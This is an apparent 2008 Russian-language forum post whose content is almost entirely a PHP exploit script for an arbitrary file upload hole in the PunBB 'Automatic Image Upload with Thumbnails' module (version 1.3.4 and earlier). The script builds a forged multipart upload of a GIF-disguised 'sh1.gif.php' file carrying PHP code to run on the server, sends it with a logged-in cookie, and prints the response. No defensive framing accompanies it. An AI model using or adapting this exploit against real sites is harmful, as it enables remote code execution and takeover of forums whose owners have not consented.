17.06.2008, 18:09
|
|
Участник форума
Регистрация: 07.06.2006
Сообщений: 146
Провел на форуме:
1652093
Репутация:
490
|
|
PunBB module Automatic Image Upload with Thumbnails <= 1.3.4 arbitary file upload
PHP код:
<?php
# PunBB module Automatic Image Upload with Thumbnails <= 1.3.4 arbitary file upload
# h3ck.[rv.ua], 2008
$host = 'localhost'; # хост
$path = '/punbb/'; # путь к форуму
$file_type = 'image/gif';
$file_name = 'sh1.gif.php'; # название нового файла
$file_code = '<?php phpinfo(); ?>'; # код, который будем выполнять
$cookie = 'punbb_cookie=a%3A2%3A%7Bi%3A0%3Bs%3A1%3A%222%22%3Bi%3A1%3Bs%3A32%3A%220b9ca83006024ac122e2b1c459c0804f%22%3B%7D'; # без авторизации не будет работать..
$file_content = base64_decode('R0lGODlhAQABAIAAAP///wAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==');
$post_data = <<<POST
------------9cYrkcaQ3YTUyzCSnL8xD2
Content-Disposition: form-data; name="form_sent"
1
------------9cYrkcaQ3YTUyzCSnL8xD2
Content-Disposition: form-data; name="imagefile"; filename="$file_name"
Content-Type: $file_type
${file_content}${file_code}
------------9cYrkcaQ3YTUyzCSnL8xD2
Content-Disposition: form-data; name="uploadimg"
Submit
------------9cYrkcaQ3YTUyzCSnL8xD2--
POST;
$post_len = strlen($post_data);
$req = <<<REQ
POST http://${host}${path}uploadimg.php?subpage=upload HTTP/1.0
User-Agent: Opera/9.27 (Windows NT 5.1; U; ru)
Host: $host
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: uk-UA,uk;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Cookie: $cookie
Content-Length: $post_len
Content-Type: multipart/form-data; boundary=----------9cYrkcaQ3YTUyzCSnL8xD2
Connection: Close
$post_data
REQ;
$fp = fsockopen($host, 80, $errno, $errstr, 30);
if (!$fp) { echo "$errstr ($errno)<br />\n"; }
else {
echo "Sending... <pre>$req</pre>\n";
fwrite($fp, $req);
while (!feof($fp)) { echo fgets($fp); }
fclose($fp);
}
?>
Последний раз редактировалось Elekt; 03.09.2008 в 04:08..
|
|
|